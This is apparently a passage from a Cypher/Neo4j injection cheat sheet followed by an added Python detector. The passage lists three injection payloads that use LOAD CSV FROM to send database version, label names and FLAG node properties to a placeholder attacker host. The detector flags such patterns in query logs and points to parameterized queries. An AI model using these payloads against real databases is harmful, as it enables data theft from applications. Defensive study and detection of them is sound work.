' OR 1=1 WITH 1 as a CALL dbms.components() YIELD name, versions, edition UNWIND versions as version LOAD CSV FROM 'http://<ATTACKER_IP>/?version='+version+'&name='+name+'&edition='+edition as l RETURN 0 as _0 //
Labels (like columns)
' RETURN 0 as _0 UNION CALL db.labels() yield label LOAD CSV FROM 'http://<ATTACKER_IP>/?l='+label as l RETURN 0 as _0 //
Get information from labels (data)
Replace FLAG with the corresponding label
' OR 1=1 WITH 1 as a MATCH (f:FLAG) UNWIND keys(f) as p LOAD CSV FROM 'http://10.10.x.x/?' + p +'='+toString(f[p]) as l RETURN 0 as _0 //
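Detection side (added example, not part of the original page): all three payloads above exfiltrate through LOAD CSV FROM with a URL concatenated from query data, so a reviewer of logged Cypher query text can key on that pattern. The function name, the finding labels, the application query in TEMPLATE and the example.internal host are assumptions made for this sketch.

```python
import re

# LOAD CSV whose remote URL is a literal followed by '+': the URL is built
# from query data at run time, the pattern shared by every payload above.
URL_CONCAT = re.compile(
    r"""LOAD\s+CSV\s+(?:WITH\s+HEADERS\s+)?FROM\s+(['"])(?:https?|ftp)://[^'"]*\1\s*\+""",
    re.IGNORECASE)
# Any LOAD CSV from a remote URL (lower confidence: may be a real import).
URL_REMOTE = re.compile(
    r"""LOAD\s+CSV\s+(?:WITH\s+HEADERS\s+)?FROM\s+['"](?:https?|ftp)://""",
    re.IGNORECASE)
# Metadata procedures named on this page, and property enumeration via keys().
METADATA = re.compile(r"\bCALL\s+(dbms\.components|db\.labels)\s*\(", re.IGNORECASE)
KEYS_UNWIND = re.compile(r"\bUNWIND\s+keys\s*\(", re.IGNORECASE)

def findings(query):
    """Return the reasons a logged Cypher query text looks like out-of-band exfiltration."""
    hits = []
    if URL_CONCAT.search(query):
        hits.append("load-csv-url-built-from-data")
    elif URL_REMOTE.search(query):
        hits.append("load-csv-remote-url")
    m = METADATA.search(query)
    if m:
        hits.append("metadata-procedure:" + m.group(1).lower())
    if KEYS_UNWIND.search(query):
        hits.append("property-enumeration")
    return hits

# Constructed sample data. TEMPLATE is a hypothetical application query that
# concatenates user input; PAGE_PAYLOADS are the three strings listed above.
TEMPLATE = "MATCH (u:User) WHERE u.name = '{}' RETURN u"
PAGE_PAYLOADS = [
    "' OR 1=1 WITH 1 as a CALL dbms.components() YIELD name, versions, edition UNWIND versions as version LOAD CSV FROM 'http://<ATTACKER_IP>/?version='+version+'&name='+name+'&edition='+edition as l RETURN 0 as _0 //",
    "' RETURN 0 as _0 UNION CALL db.labels() yield label LOAD CSV FROM 'http://<ATTACKER_IP>/?l='+label as l RETURN 0 as _0 //",
    "' OR 1=1 WITH 1 as a MATCH (f:FLAG) UNWIND keys(f) as p LOAD CSV FROM 'http://10.10.x.x/?' + p +'='+toString(f[p]) as l RETURN 0 as _0 //",
]
# With a parameter, the input never becomes part of the query text.
PARAMETERIZED = "MATCH (u:User) WHERE u.name = $name RETURN u"
LEGIT_IMPORT = "LOAD CSV WITH HEADERS FROM 'https://files.example.internal/users.csv' AS row RETURN row"

if __name__ == "__main__":
    for q in [TEMPLATE.format(p) for p in PAGE_PAYLOADS] + [PARAMETERIZED, LEGIT_IMPORT]:
        print(findings(q) or "clean", "<-", q[:60])
```

Pass only the query text field to findings(), not the logged parameter map, so values bound through parameters are not mistaken for query structure.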